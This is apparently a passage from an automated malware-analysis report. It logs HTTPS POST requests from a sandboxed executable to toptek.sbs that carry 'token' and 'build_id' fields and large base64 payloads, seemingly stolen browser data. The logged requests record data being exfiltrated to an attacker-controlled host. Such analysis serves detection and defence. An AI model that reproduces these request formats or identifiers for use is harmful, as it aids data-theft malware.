                                                                                                                                                                                                                                                                                    2024-12-23 05:57:59 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 33 45 43 42 49 35 38 39 5a 35 38 51 51 51 31 36 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 33 45 43 42 49 35 38 39 5a 35 38 51 51 51 31 36 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 33 45 43 42 49 35 38 39 5a 35 38 51 51 51 31 36 38 51 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------3ECBI589Z58QQQ168Q16Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------3ECBI589Z58QQQ168Q16Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------3ECBI589Z58QQQ168Q16Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:59 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                                    Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:59 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:01 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    31192.168.2.54986894.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:00 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----Q1N7GVSR9H47QQ1V3WLN
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 393697
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:00 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 51 31 4e 37 47 56 53 52 39 48 34 37 51 51 31 56 33 57 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 37 47 56 53 52 39 48 34 37 51 51 31 56 33 57 4c 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 37 47 56 53 52 39 48 34 37 51 51 31 56 33 57 4c 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------Q1N7GVSR9H47QQ1V3WLNContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------Q1N7GVSR9H47QQ1V3WLNContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------Q1N7GVSR9H47QQ1V3WLNCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
